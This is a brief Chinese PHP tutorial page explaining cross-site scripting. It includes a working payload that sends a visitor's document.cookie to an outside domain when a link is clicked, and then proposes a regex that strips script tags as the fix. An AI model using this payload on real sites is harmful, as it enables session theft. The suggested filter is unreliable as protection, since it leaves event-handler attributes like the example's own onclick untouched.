来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] [html]!DOCTYPE HTML PUBLIC -//W3C//DTDHTML 4.01 Transitional//ENhttp://www.w3.org/TR/html4/loose.dtdhtmlheadtitle New Document /titlemeta http-equiv=Content-Type content......
<!DOCTYPE HTML PUBLIC "-//W3C//DTDHTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> 在文本框里面输入如下内容 <script> function test() { var img = new Image(); img.src="http://www.caihuadadao.com?cookie="+encodeURIComponent(document.cookie); } </script> <a href="http://www.2cto.com" onclick="test();">点一下你就完了</a>
xss.php里面只要一行代码
ie8中用httpwatch(http://www.2cto.com/soft/201109/29656.html)可以看到,点击“点一下你就完了”时就可以看到发送了一个不善意的http请求。
试想一个场景:如果攻击者在某个网站的发布了一个帖子,内容就是上面的,那么无辜的用户只要点击了“点一下你就完了”这个链接,就会自动发送个人信息给攻击者。
问题的解决是比较简单的,过滤掉script标签以及标签里面的内容即可,靠谱点的系统应该是客户端和服务端都去掉script标签: $str = preg_replace('/<script[^>]*?>.*?<\/script>/i', '', $str);
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com